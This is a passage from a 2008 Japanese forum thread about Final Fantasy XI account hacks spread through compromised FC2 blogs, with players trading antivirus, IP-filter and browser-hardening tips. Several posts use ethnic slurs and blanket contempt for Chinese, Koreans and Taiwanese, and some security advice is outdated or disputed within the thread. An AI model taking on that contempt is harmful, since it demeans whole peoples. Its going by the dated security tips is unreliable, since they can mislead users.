ちなみに、(リネのニュースで出た話だが)業者の下っ端の給料は苦力だから恐ろしく安い。
つまり何であれ売り抜けた時点で即純収入になる。

690 :既にその名前は使われています:2008/03/25(火) 13:27:36.17 ID:MjQNpCSt
ブラウザってなんでIEだとアウトでOperaだとセーフなの?
罠の仕組みがわからん。。

691 :既にその名前は使われています:2008/03/25(火) 13:27:45.87 ID:tJZXnsSE
>>686
日本人は何事もすぐに情報を持ち寄って攻略し、効率的な手段を構築する
そしてセキュリティ対策に疎く、泣き寝入りが多い
更に失ったらもう一度再構築することで満足感に浸る

これ以上のカモ民族が他にいようか?

692 :既にその名前は使われています:2008/03/25(火) 13:30:40.23 ID:GfU2CfMk
>>690
単純に言うとIEの弱点を突くから。
Operaにも弱点はあるが、IEに比べれば
使っている人間の数が少ない、なので狙う方もIEを狙う。

693 :既にその名前は使われています:2008/03/25(火) 13:32:29.27 ID:V1FUYBaL
おっと、「中華を知らない奴は全員カモだ」に変換おながいします。

>>690
IEはゲイツと愉快な下っ端たちによって多数のMicrosoft社製ソフトと互換させるように作っている。
でそれらが残らずセキュリティホール持ちだったというわけだ(有名なのにActiveXがある)。
>>691
・Wikiが性善説のユーザーによって成り立っていると思い込んでいる
・近視眼的(自分の身に降りかかるほど近くまで侵食されないと努力したがらない)
も。

694 :既にその名前は使われています:2008/03/25(火) 13:34:18.39 ID:iZibIXDg
>>691
世界最低の検出率を誇るソースネクストウイルスセキュリティや
公式でウイルスばら撒く台湾ウイルスバスターが
ランキング上位を占めてるしなぁ。
ttp://bcnranking.jp/category/subcategory_0019.html

695 :既にその名前は使われています:2008/03/25(火) 13:37:47.39 ID:gnv8Cqm9
公式発表マダー?

696 :既にその名前は使われています:2008/03/25(火) 13:38:15.50 ID:/z/ByKzc
>>695
英語版サイトにはもうきてる
日本は放置

697 :既にその名前は使われています:2008/03/25(火) 13:52:39.37 ID:fAiOj5Ix
>>696
慎重に検討を重ねまくってるんじゃね?
あと10年ほど

698 :既にその名前は使われています:2008/03/25(火) 13:54:34.46 ID:OHH8MISE
>>689
つまり中華は世界中で垢ハックしてるが、今でも世界中にRMT顧客が絶えず付いてて
(中華にとって)十分な金を落としてるって事か?

>>691
>そしてセキュリティ対策に疎く、泣き寝入りが多い
セキュリティに疎いのは日本だけなの?
イギリスのフレは「よーわからん フリーソフトが人気だからそれ入れてる」
とか言ってた。
泣き寝入りは同意だな・・・

699 :既にその名前は使われています:2008/03/25(火) 13:56:56.46 ID:2UE3q0B9
ハゲガル云々まで話が広がってるみたいだが、とりあえず使ってない倉庫キャラを消すところから
始めようと思う。
みんなもいるだろ?よく考えて見ればゴミばっかり詰まってるキャラ

700 :既にその名前は使われています:2008/03/25(火) 14:01:13.00 ID:cG7zxlfp
>>331
俺、先日から2回垢ハックされたんだが、
1回目は垢ハック後パスワード変更されてサポセンに電話するしかなかったが、
2回目は俺がログイン中の垢ハックだったのでログイン合戦を繰り返して
20分ほどでハッカーがあきらめてくれたようだ。
で、自動ログイン設定を解除した上でパスワードを変更し、
そのままGMコールをしたところ、5人待ちだったけど、
結構5分後くらいには来てくれたよ。
いかにも優先順位が高いので素っ飛んできましたっていう印章だった。

701 :既にその名前は使われています:2008/03/25(火) 14:07:00.66 ID:xV7avn5I
2回されるって、どんだけセキュリティ甘いんだよw

702 :既にその名前は使われています:2008/03/25(火) 14:08:20.49 ID:iZibIXDg
>>698
何年も前のデータだとこんな感じだった。
米 1000億円 →中国
韓 1000億円 →中国
日 100億円 →中国
今はもっと額が増えてるんじゃないかな。特に出遅れてた日本は。
日本では今ひとつな洋ゲー(WoWやLotROやSecondLifeなど)でも
アカハックは普通にある。

>イギリスのフレは
ヨーロッパはAntiVir、avast、AVG、BitDefender
その他もろもろを入れるのに抵抗ないからねぇ。
言語的に。英国製だとSophosくらいしか聞いたことないけど。

703 :既にその名前は使われています:2008/03/25(火) 14:10:39.07 ID:GjK/r663
もう業者じゃないな。一般の様々な業者に失礼。
FF内での規約違反だけに足らずに、リアルでの犯罪者共だからな。
奴等から買ってるRMT倫理委員会(笑)も然り。

704 :既にその名前は使われています:2008/03/25(火) 14:12:25.74 ID:cG7zxlfp
>>701
環境を書こうか。
1回目は、
・WinXP SP2 update全くしとらず
・アンチウイルスソフトはavast!の最新版最新定義ファイル
・ルーターの下流に接続されたPC
・POLは自動ログイン設定にしていた
この環境で垢ハックされたので、以下の対策を施した。
・Win updateを行った
・avast!でフルスキャンかけてマルウェアを3つみつけ削除した
しかしすぐその2日後にまた垢ハック。
これではいかんということで、さらに以下のように対策。
・アンチウイルスソフト「F-secure」でフルスキャンし
 さらに12個のマルウェアを検知・削除
・POLの自動ログイン設定を解除し、毎回手入力でパスワード入力すること
この対策を行ってから約3週間経つが垢ハックされていない。

705 :既にその名前は使われています:2008/03/25(火) 14:13:15.92 ID:EH31oboY
>>700
余程マヌケなんだなお前。パパのパソコン勝手にいじってるのか?


706 :既にその名前は使われています:2008/03/25(火) 14:15:57.04 ID:xV7avn5I
>>704
いやいや、そういう意味じゃなくって、1回目の時点で、怪しいサイトみるなよ。
そこまでできるなら、毎回ソースチェックかけるとかさ・・・。

そういうの全部やってて、垢ハックくらってるなら、おまいさんはすーぱーはかーに狙われてるw
つーか、そこまでして狙われる資産を知りたい。

707 :既にその名前は使われています:2008/03/25(火) 14:15:57.14 ID:fAiOj5Ix
>>700
そんなあなたにPeerGuardian2おぬぬめ

708 :既にその名前は使われています:2008/03/25(火) 14:16:06.77 ID:fUj7j779
>>704
おい・・1回目と2回目の間でパス変更してないじゃないか

709 :既にその名前は使われています:2008/03/25(火) 14:16:29.47 ID:hs/jxftM
avast!?はザルに近いから信用しちゃ駄目

710 :既にその名前は使われています:2008/03/25(火) 14:16:53.72 ID:cG7zxlfp
>>705
700がマヌケというより、ちゃんと対策を施しても
垢ハックされるときはされるという例だろう。
あと、avast!+windows update最新にしててもダメだっていう
例示でもある。
700が言いたいのは、
・カスペエンジン搭載クラスの高レベルのアンチウイルスソフト推奨
・自動ログイン設定はするな
ということじゃないかな。

711 :既にその名前は使われています:2008/03/25(火) 14:18:53.18 ID:cG7zxlfp
>>706
怪しいサイトはみてないよ。
avast!で検知できなかったマルウェアがF-secureで検知されただけだと思う。
>>707
検討してみます。
>>704
あ、ごめんw 当然のことだから書きわすれてたw
だいたいサポセンに電話した時点でパスワード変更されるのは自明な
ことだしw

712 :既にその名前は使われています:2008/03/25(火) 14:22:35.23 ID:KvRYpdDq
>>711
ハードディスクのオールクリア&再インスコはしたのです?

713 :既にその名前は使われています:2008/03/25(火) 14:25:04.07 ID:qjtmYPzf
>711
avast!、F-secureで検知&駆除できなかったものがまだあるかもしれない
駆除できてもOSの一部が壊されてる場合も・・・
HDDフォーマット&OS再インストールしたほうが・・・

714 :既にその名前は使われています:2008/03/25(火) 14:25:19.54 ID:5BeXpZgU
2回目にハックあったときも自動ログインにしてましたか?

715 :既にその名前は使われています:2008/03/25(火) 14:32:58.34 ID:GfU2CfMk
最近の世界的な業者の狙いは管理の甘いゲームアカウントを取って
そこから芋づる式にクレジットカードやその他の個人情報を抜き取る
という方向にシフトしてるらしいからRMT市場だけではないんじゃないかな。

716 :既にその名前は使われています:2008/03/25(火) 14:34:37.12 ID:hdp/xFH/
>>715
クレカで払い続けている人は、猛省した方が良いだろうな。
自分はクレカで払っていたが、Webmoneyに変更した。

いつかはクレカの被害に移っていくはず

717 :既にその名前は使われています:2008/03/25(火) 14:54:38.49 ID:eB4wriae
>675
警察の生活安全課ってのは新米とか飛ばされた奴とか、
そんなのが大勢いる。つか、自分の仕事自体がわかってないのもいる。
対策としては、まず始めに各県の県警本部に電話で連絡して、
どうしたら良いのか聞く。さすがに県警本部の連中はプロなので、
的確に対応してくれる。その時に対応した人の名前をメモっておいて、
地域の警察署に行き、その人の名前を出しながら話を優位に進めた方が良い。

718 :既にその名前は使われています:2008/03/25(火) 14:56:43.57 ID:KvRYpdDq
どのサイトが改竄されたかの一覧がもう張られなくなってるので張ってみる。

■改竄被害ブログ一覧
 黒猫奮闘記 (インラインフレーム・1回改竄され修正済み)
 ぺってん (インラインフレーム・1回改竄され修正済み)
 戦士スキー(インラインフレーム・2回改竄され修正済み)
 某青魔道士(インラインフレーム・2回改竄され閉鎖)
 ペコろぐ。(Javaスクリプト・1回改竄され修正済み)
 ヴァナモンblog(Javaスクリプト・1回改竄され修正済み)
 ある黒魔道士の軌跡(インラインフレーム・1回改竄され修正済み)
 FF11初心者の館(Javaスクリプト:改竄されてウィルスまきちらし中)
 Lostfr【誰か】かまって【くれませんか?】(Javaスクリプト・1回改竄され修正済み)

修正あればよろしく。

719 :既にその名前は使われています:2008/03/25(火) 14:56:49.77 ID:iZibIXDg
>>8 のサイバーなんちゃらに話通さないとね。


720 :既にその名前は使われています:2008/03/25(火) 15:01:24.50 ID:AYjZnBwT
>>718
FC2FFブログ大手を軒並みじゃなくて、聞いたこともないのが混じってるあたり
全てのFC2ブログをハックできるわけじゃないような気がする

721 :既にその名前は使われています:2008/03/25(火) 15:06:49.37 ID:hdp/xFH/
ペコー 愛しているよ

722 :既にその名前は使われています:2008/03/25(火) 15:12:22.07 ID:iZibIXDg
>>720
割と大手を食ってるように思える。

723 :既にその名前は使われています:2008/03/25(火) 15:20:38.73 ID:tobfKCIJ
PeerGuardian2って危険IPリストにリネージュなんちゃらって名前が入ったパス入れるようになってるけど
これでPOLにも効果あるの?

724 :既にその名前は使われています:2008/03/25(火) 15:20:44.60 ID:QRF6L8mU
一回かけて150円。結局「大変混みあっています。お掛け直しください。ぶちっ」を10回以上やっても繋がらない。

儲かってそうですね^^

725 :700:2008/03/25(火) 15:26:30.86 ID:cG7zxlfp
>>712
してません。めんどくさかったので。
>>713
F-secureで検知できてないのがあったとしても、
自動ログイン設定を解除しているので垢ハックされないんでしょうね。
まぁ、ヒマができたら再インスコも検討しますわ。
>>714
はい、2回目のハックまでは自動ログインにしてました。
>>715
まぁおれの場合、ゲームはWinで、
その他はMa cでやってるので問題ないけどね。
最近のMa cはWinもnative起動できるので一台でこれが可能。

726 :723:2008/03/25(火) 15:30:01.40 ID:tobfKCIJ
PeerGuardian2って危険IPリストにリネージュなんちゃらって名前が入ったパス入れるようになってるけど
これでPOLにも効果あるの?

PeerGuardian2によって危険なIPアドレスへのアクセスを遮断するためのリストです。
利用法については「基本的な対策 - IPフィルタ」を参照してください。
説明 URL
Lineageトロイ http://lineage....
中国・韓国・台湾 http://lineage....

ってなってるけど

727 :既にその名前は使われています:2008/03/25(火) 15:30:01.68 ID:GO6bIFih
またこいつか

728 :723:2008/03/25(火) 15:31:08.94 ID:tobfKCIJ
あー ごめん。このテキストファイルの中に危険IPリストが定義されているのか…


729 :既にその名前は使われています:2008/03/25(火) 15:32:54.64 ID:1T0NGHDd
ちょっと聞きたいことがあるんだけどFF11とは無関係のfc2ブログも危険?fc2以外のブログも危険?
今のところ報告はないけど安全とは言えないって感じかな?

730 :既にその名前は使われています:2008/03/25(火) 15:33:52.26 ID:cG7zxlfp
>>729
Macで閲覧すれば無問題。
Winで閲覧する限り、かならず危険を伴う。

731 :既にその名前は使われています:2008/03/25(火) 15:34:52.28 ID:gLU6AqT5
次スレ立てるときテンプレに>>521を入れて欲しい。
ハックの状況を少しでも絞り込みたい…。

あとこのやりとりも飽きたからテンプレに入れてほしい。
●<もうログインしっぱなしにしとけばいいじゃん
■<FFは後からログインしたほうが優先される

732 :既にその名前は使われています:2008/03/25(火) 15:35:13.19 ID:pn98/92E
「Safari」Windows版にパッチ未提供の脆弱性、アドレスバー偽装など2件
ttp://internet.watch.impress.co.jp/cda/news/2008/03/25/18928.html

733 :既にその名前は使われています:2008/03/25(火) 15:35:22.24 ID:DHnWiZWh
PeerGuardian2入れるとFF起動するのにブロックされてるIPを1個1個解除
するのにものすごい量なのだがみんなどうしてるの?


734 :既にその名前は使われています:2008/03/25(火) 15:36:50.24 ID:iZibIXDg
>>729
FC2フォーラム見てたらリネージュのブログもやられたってよ。
ネトゲ系は大体狙われてんじゃね? ROとかも。

735 :既にその名前は使われています:2008/03/25(火) 15:40:14.81 ID:1T0NGHDd
>>730>>734
やっぱそうか・・・
ありがと

736 :既にその名前は使われています:2008/03/25(火) 15:45:30.21 ID:hs/jxftM
>>733
ある程度の範囲が■eのアドレスだからxxx.xxx.xxx.1-xxx.xxx.xxx.254を許可リストに入れれば良いんじゃね

737 :既にその名前は使われています:2008/03/25(火) 15:59:23.11 ID:HImxVR+r
>>733
WhoisでそのIPアドレスを引くと、
一連のIPアドレスが誰の所有になってるか出る。
そのアドレスの範囲を指定すればよろし。

738 :既にその名前は使われています:2008/03/25(火) 16:00:23.49 ID:gV659xLe
100%ウィルスを防ぐ方法は無い!だが極力防御を固めてスキを与えなくすることは出来る!

1)今すぐWindowsUpDateしましょう。今すぐ。
 XP:スタート→コントロールパネル→セキュリティセンター→左側のヘルプ項目の中の「WindowsUpDateから最新の〜」
 他:知らん
2)今すぐアンチウィルスソフトを導入&最新のバージョンに。ウィルススキャンもしよう。今すぐ。
3)今すぐPOLの自動ログインを切ってパスを毎回手で入力するようにしよう。パスも変えてしまうと良いですね。今すぐに。
4)その際スクリーンキーボードを使うとGOOD!キーボードは非推奨です。
 ※スタート→すべてのプログラム→アクセサリ→ユーザー補助→スクリーンキーボード
5)面倒ですが毎回パスを入力する羽目になります。そん時もスクリーンキーボードつかえばなお安心!

ベターなアンチウィルスソフトとかは諸説あるから好きに決めましょう。何でも無いよりマシ!
○○してるから大丈夫だよね!ってひとはヤバイです。
すなわちこれやってるから安心ってわけでもないです。ウィルスや散布方法は日々変わっています。常に警戒を怠らないでね!
他にもマメにパスを変えるとか色々あるよ〜自衛しよう!

739 :既にその名前は使われています:2008/03/25(火) 16:04:50.12 ID:GjK/r663
ブロックに、リネ資料室さんのリネトロイとシナチョン台湾だけなら
FF普通にログインできるんだが、俺だけなのか。

740 :既にその名前は使われています:2008/03/25(火) 16:05:17.22 ID:yuQmWgMr
>>738

1)今すぐWindowsUpDateしましょう。今すぐ。
 XP・Vista:スタート→すべてのプログラム→Windows Update
 他:知らん


741 :既にその名前は使われています:2008/03/25(火) 16:06:19.89 ID:gLU6AqT5
>>739
俺もリネ資料室の手順どおりに導入して普通にログインできてる。

742 :既にその名前は使われています:2008/03/25(火) 16:07:28.05 ID:cG7zxlfp
>>738
>3)今すぐPOLの自動ログインを切ってパスを毎回手で入力するようにしよう。パスも変えてしまうと良いですね。今すぐに。

ちょっと待て。それじゃ意味がない。
順番は、
(1)自動ログイン設定をOFFにする
(2)パスワードを変更する
(3)以降、パスワードは手動入力してPOLにログインする
この順番じゃないとダメ。
とくに(2)のあとに(1)をやっても無意味。

743 :既にその名前は使われています:2008/03/25(火) 16:08:20.97 ID:GO6bIFih
>>739
俺もFFに関して解除とかした記憶がないんだがブロックされてるってのが何故かわからん
>>733
許可の垂れ流しを見てブロックされてるって勘違いしてないよな?

744 :既にその名前は使われています:2008/03/25(火) 16:10:46.48 ID:YCgkVOG/
PS2でやってる分には安全なの?

745 :既にその名前は使われています:2008/03/25(火) 16:11:29.00 ID:OoZjY94u
グーグルで検索開く時はキャッシュを開く
PCスタンバイにする時はLANケーブルだけぬいとく。
java.comでjavaの更新
peer guadian2
antivir
メジャーすぎてIE6はやばいし古いのでからIE7にする。
ポップアップブロック広告設定
java off設定
iframe off設定
緊急ログイン用PS3購入 (■一押し推奨w)
ルーターでps2とパソコンをつなげない

746 :既にその名前は使われています:2008/03/25(火) 16:12:26.23 ID:gV659xLe
>>740
>>742
ごめんwww でも色々ツッコんでください。俺も勉強したい。だれか直してくれても全然いいし。
情報錯綜しまくりなのでまとめたかった。手入力とかワロスwwwwって言ってる奴もいるしな〜
なにやっても無駄wwwってのもわかるけど、やっといたほうがいいことってあるよね。

747 :既にその名前は使われています:2008/03/25(火) 16:13:23.82 ID:OoZjY94u
real one playerのアンインストールもしなきゃ

748 :既にその名前は使われています:2008/03/25(火) 16:14:01.66 ID:/z/ByKzc
PS3…だと…?

749 :既にその名前は使われています:2008/03/25(火) 16:14:24.41 ID:iK1zczLu
ブログではてなを利用してるんですが、これまではてなブログでハクられた
ケースって聞いたことありますか?

750 :既にその名前は使われています:2008/03/25(火) 16:14:49.54 ID:GjK/r663
>>733,741
設定が違うのかね?リストにはこの2行のみ。

シナチョン台湾
tp://lineage.nyx.bne.jp/misc/security/cnkrtw.txt
リネージュトロイ
tp://lineage.nyx.bne.jp/misc/security/lintrojan.txt

751 :既にその名前は使われています:2008/03/25(火) 16:15:26.65 ID:0ryBVCpV
海外では全く被害がないという不具合

752 :既にその名前は使われています:2008/03/25(火) 16:15:27.50 ID:OoZjY94u
ツール→インターネットオプションを選択。
 ・セキュリティタブをクリックし→「レベルのカスタマイズ」ボタンをクリック。
 ・ずーっと下の方にスクロールさせていくと、「その他」の項目に
  「IFRAMEのプログラムとファイルの起動」という項目がありますので
  「無効にする」を選んでOKボタンをクリック。

753 :既にその名前は使われています:2008/03/25(火) 16:18:05.16 ID:GO6bIFih
ググれかす

754 :既にその名前は使われています:2008/03/25(火) 16:19:28.51 ID:GO6bIFih
>>753は誤爆だすまん

755 :既にその名前は使われています:2008/03/25(火) 16:20:36.54 ID:EH31oboY
>>753
ググって出てきたFC2のブログで感染したんだけど^^;

756 :既にその名前は使われています:2008/03/25(火) 16:25:10.33 ID:iZibIXDg
FC2スレとマルチになるけど、FC2ブログに仕掛けられたうち最も新しい物、
現時点(25日16:00)でのfccja(製造23日5:50、提出23日14:00〜14:20)のスキャン。

1. 敵のサーバから降ってきて実行されるexe
ttp://www.virustotal.com/analisis/72233d709737ad9281f40173f9365136
2. exeが実行され投下されるトロイ本体のdll
ttp://www.virustotal.com/analisis/626d786492a4b1e7a8bc9713fe3177bf

1.は感染しそうな時点でのアンチウイルスの「検知」による阻止を、
2.は感染した後でアンチウイルスを入れた状況を想定してほしい。
「駆除」は2.のほうが大事だと思うが、微妙に落ちる。

757 :既にその名前は使われています:2008/03/25(火) 17:00:02.79 ID:gG9qutBm
age

758 :既にその名前は使われています:2008/03/25(火) 17:00:09.80 ID:gwiQ2FCi
垢ハックされた場合、本人が連絡してください ttp://live27.2ch.net/test/read.cgi/ogame/1206422526/
ID:OeUFh/Hw=垢ハック業者 ttp://live27.2ch.net/test/read.cgi/ogame/1206426088/
問題は垢ハックではなく、それに対する■eの対応 ttp://live27.2ch.net/test/read.cgi/ogame/1206429905/
垢ハックスレうざい ttp://live27.2ch.net/test/read.cgi/ogame/1206428920/l50
【垢ハック】全鯖合同一斉禿ガルデモ【サポセン】 ttp://live27.2ch.net/test/read.cgi/ogame/1206415973/
■eは速やかに垢ハックに対する声明を発表しろ ttp://live27.2ch.net/test/read.cgi/ogame/1206359298/
■eが日本人だけ差別して垢ハック救済しない件 ttp://live27.2ch.net/test/read.cgi/ogame/1206408219/
垢ハックが仕込まれるいるURLを晒すスレ ttp://live27.2ch.net/test/read.cgi/ogame/1206424684/
フレが垢ハックされました ttp://live27.2ch.net/test/read.cgi/ogame/1206375781/
■垢ハック大流行なのにお前らFFか■ ttp://live27.2ch.net/test/read.cgi/ogame/1206380323/
垢ハックは自己責任ではありません ttp://live27.2ch.net/test/read.cgi/ogame/1206429573/
■e<垢ハックされたのがNAなら救済します ttp://live27.2ch.net/test/read.cgi/ogame/1206406698/
垢ハックされたらageるスレ ttp://live27.2ch.net/test/read.cgi/ogame/1206362574/
垢ハックとか気にするのもう止めようぜ ttp://live27.2ch.net/test/read.cgi/ogame/1206428605/
【みんなで】垢ハック【伝えよう】 ttp://live27.2ch.net/test/read.cgi/ogame/1206379509/
垢ハックされた証拠出せよ ttp://live27.2ch.net/test/read.cgi/ogame/1206380600/
【fc2】垢ハックを報告したり雑談スレ89【.exe】 ttp://live27.2ch.net/test/read.cgi/ogame/1206421637/
垢ハック魔導士強すぎ修正汁 ttp://live27.2ch.net/test/read.cgi/ogame/1206408461/
垢ハックされた人にたいしてはデータを巻き戻すべき ttp://live27.2ch.net/test/read.cgi/ogame/1206431492/
「垢」でスレタイ抽出したらこんななったwさすがに大杉www

759 :既にその名前は使われています:2008/03/25(火) 17:01:13.87 ID:Y3Ld5TjI
>>751
>>553>>664
まったくない訳ではないのかな

760 :既にその名前は使われています:2008/03/25(火) 17:03:12.19 ID:GbUm+hdk
PS2ハックまとめ
・中国人が窓から覗いてハック
・パスうち間違えて偶然ハック
・か○し、か○じょがファックの代償にハック
・母ちゃんがニートの息子にしびれを切らしてハック

761 :既にその名前は使われています:2008/03/25(火) 17:07:44.47 ID:V2mh3qpS
なあ、垢ハックによるキャラの鯖移動って
スクエニに宛ててる業者からの上納金なんじゃないか?w

とりあえず、クレカ利用者はwebマネー払いに変えとこうぜ

762 :既にその名前は使われています:2008/03/25(火) 17:08:40.84 ID:6lq0QDhU
世界のガンだな、中華ってのは。
高級ホテルとかでも中国人旅行客が泊まるときは部屋中の備品という備品を撤去するそうな。
冗談みたいな話、部屋のTVを持って帰ろうとした中国人客がいたとか。


763 :既にその名前は使われています:2008/03/25(火) 17:10:08.01 ID:yuQmWgMr
100%ウィルスを防ぐ方法は無い!だが極力防御を固めてスキを与えなくすることは出来る!

1)今すぐWindowsUpDateしましょう。今すぐ。
  XP・Vista:スタート→すべてのプログラム→Windows Update
  他:知らん

2)今すぐアンチウィルスソフトを導入&最新のバージョンに。ウィルススキャンもしよう。今すぐ。

3)今すぐPOLの自動ログインを切ってパスを毎回手で入力するようにしよう。パスも変えてしまうと良いですね。今すぐに。
  【手順】
  1.自動ログイン設定をOFFにする
  2.パスワードを変更する
  3.以降、パスワードは手動入力してPOLにログインする

4)その際スクリーンキーボードを使うとGOOD!キーボードは非推奨です。
  ※スタート→すべてのプログラム→アクセサリ→ユーザー補助→スクリーンキーボード

764 :既にその名前は使われています:2008/03/25(火) 17:10:17.90 ID:yuQmWgMr
5)面倒ですが毎回パスを入力する羽目になります。そん時もスクリーンキーボードつかえばなお安心!

6)IPフィルターもかければモアベター。リネージュ資料室見て手順読み飛ばさずにPG2導入しましょう。

7)IFRAMEを使った罠が多い!IEの設定を変えてIFRAMEを無効にしよう。
  ツール→インターネットオプションを選択。
   ・セキュリティタブをクリックし→「レベルのカスタマイズ」ボタンをクリック。
   ・ずーっと下の方にスクロールさせていくと、「その他」の項目に
    「IFRAMEのプログラムとファイルの起動」という項目がありますので
    「無効にする」を選んでOKボタンをクリック。

ベターなアンチウィルスソフトとかは諸説あるから好きに決めましょう。何でも無いよりマシ!
(どれがいいか悩んだらカスペルスキー入れとけ新種の対応が早いらしい)
○○してるから大丈夫だよね!ってひとはヤバイです。
すなわちこれやってるから安心ってわけでもないです。ウィルスや散布方法は日々変わっています。常に警戒を怠らないでね!
他にもマメにパスを変えるとか色々あるよ〜自衛しよう!

765 :既にその名前は使われています:2008/03/25(火) 17:11:25.81 ID:erjVAm8i
パスワードファイルって、何ていうファイル名?
ファイル抜き取るにしても、ファイルの場所とファイル名がわからないとダメだよな?
どのタイミングで抜き取られてんの?

766 :765:2008/03/25(火) 17:16:26.37 ID:erjVAm8i
事故解決

DLトロイ→アカハック用トロイ→パス抜き、か。
手がこんでやがるなぁ。

767 :既にその名前は使われています:2008/03/25(火) 17:17:09.80 ID:GjK/r663
ゲストログインを ON/OFF ユーザーが任意で切替えできるようにしろよ。
もちろん設定できるのは、メインユーザーのみで。

768 :既にその名前は使われています:2008/03/25(火) 17:18:38.71 ID:wauNaTUd
回線2本引いて一本をFF専用線にしてFFをインスコしたPCに直差し。
そのPCではアンチウィルスソフトやWindowsのアップデート以外での
ネットアクセスをしないようにすれば完璧かな?

ウチは通常電話回線とBフレッツの2回線でやってるから通常電話回線をADSLにでも
すれば行けそうだ。
イーモバイルのホームアクセスなら一ヶ月1980円だし、それで安全になるなら
安いもんかもしれん。

769 :既にその名前は使われています:2008/03/25(火) 17:21:21.86 ID:F7ukR53f
>>768
FF11はPS2 or xboxでプレイ
PCはフォーマットからOS再インスコして、FF11のIDやパスはいっさい入力しない

の方が安上がりじゃない?2回線のランニングコスト次第かな?

770 :既にその名前は使われています:2008/03/25(火) 17:23:58.71 ID:1T0NGHDd
http://jbbs.livedoor.jp/game/43616/
いらないだろうけど作った( ^ω^)管理はしないお

771 :既にその名前は使われています:2008/03/25(火) 17:24:02.10 ID:BKM8BC0w
>>768
BフレッツはPPPoEセッション2つはれるんだが……。

772 :既にその名前は使われています:2008/03/25(火) 17:25:38.22 ID:EH31oboY
>>771
だったら複数セッション同時接続可能なルーター晒せって証拠だよ

773 :既にその名前は使われています:2008/03/25(火) 17:28:49.01 ID:BKM8BC0w
>>772
複数セッションはれるルータもあるけど、必須じゃない。
ハブで分配してルータ2個でおkだから。

774 :既にその名前は使われています:2008/03/25(火) 17:29:01.80 ID:oKb27/UH
うちで使ってる数年前のBA8000PROでさえできるし
今時のルーターならできるんじゃないの?

775 :既にその名前は使われています:2008/03/25(火) 17:29:22.77 ID:b9pEtjv5
FireFoxにNoScript入れてみた
めんどくさそうと思ってたけどホワイトリスト形式で信頼できるサイトだけ許可すればいいんだな、これはいいわ

あと欲を言うと
FireFoxだとジュゲムのブログのデザインがおかしくなるのさえなんとかなればなあ

776 :既にその名前は使われています:2008/03/25(火) 17:30:22.72 ID:GbUm+hdk
うちの3kで買ったルータもできる

777 :768:2008/03/25(火) 17:30:44.39 ID:wauNaTUd
もう物理的に切り分けないとダメかもしれん、と768を書いた。

773の接続に興味がある。
中途半端な知識しかない俺に教えておくれい。

778 :既にその名前は使われています:2008/03/25(火) 17:33:54.51 ID:NxOTbSzI
垢ハック多発で卒業者多数。
垢ハックに喰らってなくてもフレやらが喰らってFFいる理由もなくなり
雪崩のように引退。

RMTの供給は増えるだろうが需要が少なくなってFF終了。
結局自分にツケが回ってくるって気づかないのかな業者はw




779 :既にその名前は使われています:2008/03/25(火) 17:35:44.40 ID:BKM8BC0w
>>777
現状はNTTの光終端とルータのWANポート直結なってると思うけど、
その間にスイッチングハブかまして、そこに新しいルータをつなぐだけ。
もちろん、ISP(プロバイダ)契約は2個になるけど、足回り回線は1本ですむ。

ちなみに、地域にもよるけど、1個目のルータを起動してから、
すぐに2個目のルータを起動するとつながらないことがある。
その場合は15分くらいまってから2個目を起動するとたいていはつながるっぽい。

780 :既にその名前は使われています:2008/03/25(火) 17:36:36.65 ID:eeYPisjz
カスペルスキーの試用版でも入れとけば少しは被害なくなるのに
何で駄々漏れのクソルスバスターなんか入れてるわけ?

781 :既にその名前は使われています:2008/03/25(火) 17:38:08.53 ID:EH31oboY
>>780
官公庁で一杯使われてて名前を知ってたから自分のパソコンにも入れた公務員のパパを持つ子が(ry

782 :既にその名前は使われています:2008/03/25(火) 17:38:36.27 ID:AYjZnBwT
>>778
食い尽くしたら次の獲物にいくだけだから、そこまで考えるわけない

783 :既にその名前は使われています:2008/03/25(火) 17:39:43.30 ID:r14sYMpC
スクリーン キーボードを起動すると下記の画面が表示されます。
「スクリーン キーボードは四肢に障害がある方を補助する基本的な機能を提供します〜」
もともとセキュリティ目的で提供された機能ではありません。
マウスやキーボードの操作を記録するソフトで調べたところ
下記のように「マウスを使用した位置座標」と「入力したキーの内容」の両方が記録されます。

☆テンキーを使って「123」と入力した場合
 マウス左クリック,X座標,y座標
 キーボード_テンキー1,クリック
 マウス左クリック,X座標,y座標
 キーボード_テンキー2,クリック
 マウス左クリック,X座標,y座標
 キーボード_テンキー3,クリック

784 :既にその名前は使われています:2008/03/25(火) 17:39:58.59 ID:eeYPisjz
>>782
横山三国志のイナゴを思い出した


785 :既にその名前は使われています:2008/03/25(火) 17:39:59.62 ID:r14sYMpC
☆メインキーボードを使って「123ABC」と入力した場合の例
 マウス左クリック,X座標,y座標
 メインキーボード1,クリック
 マウス左クリック,X座標,y座標
 メインキーボード2,クリック
 マウス左クリック,X座標,y座標
 メインキーボード3,クリック
 マウス左クリック,X座標,y座標
 メインキーボードA,クリック
 マウス左クリック,X座標,y座標
 メインキーボードB,クリック
 マウス左クリック,X座標,y座標
 メインキーボードC,X座標,y座標

ということは、キーロガーソフトに対するセキュリティー上の効果は全くないと考えていいと思います。

786 :既にその名前は使われています:2008/03/25(火) 17:40:27.04 ID:CE2JkWXV
今回「たまたま」カスペの対策早かっただけだろ。
対策より前に感染してた可能性だってあるしな。
スクエニが言うような自衛してたって抜かれるものは抜かれる。



787 :既にその名前は使われています:2008/03/25(火) 17:40:53.24 ID:BKM8BC0w
カスペは製品版は高いと思う……。

# とかいいつつ9台分ライセンス契約してる漏れは徳島信者。

788 :既にその名前は使われています:2008/03/25(火) 17:40:59.45 ID:iZibIXDg
>>782
正式サービス開始したばかりのパンドラサーガの狩場が
すでに中華ばっかだしね。既にBOTかもしれんが。

789 :既にその名前は使われています:2008/03/25(火) 17:42:15.29 ID:oKb27/UH
>>778
他人の土俵で暴れるだけだから損失なんて微々たるもんだろうしね。
次のテーマパークに引っ越すだけだよ。

790 :既にその名前は使われています:2008/03/25(火) 17:44:00.53 ID:vED0t+l4
>>763
すまん、3)のパスワードってのは、
POLのパスワード?
それともメンバーパスワード?

791 :既にその名前は使われています:2008/03/25(火) 17:44:14.62 ID:eeYPisjz
銀行とかでネット振込みとかする場合に暗号表使う奴あるよな?
あれを使えばいいんじゃないの?

登録住所に書留で送って不正な住所で登録している奴は削除っていう方向で。
業者なんかどうせペンギン村なんだから消しとけばいい

792 :既にその名前は使われています:2008/03/25(火) 17:44:21.31 ID:OoZjY94u
日本人は泣き寝入り好きだなw集団訴訟すれば話題になって■に大打撃あたえれるのにw

793 :既にその名前は使われています:2008/03/25(火) 17:48:26.86 ID:r14sYMpC
>>763-764

スクリーンキーボードについて色々調べてみたが無意味っぽいんですが。
hxxp://d.hatena.ne.jp/RoboForm/20060922/p1

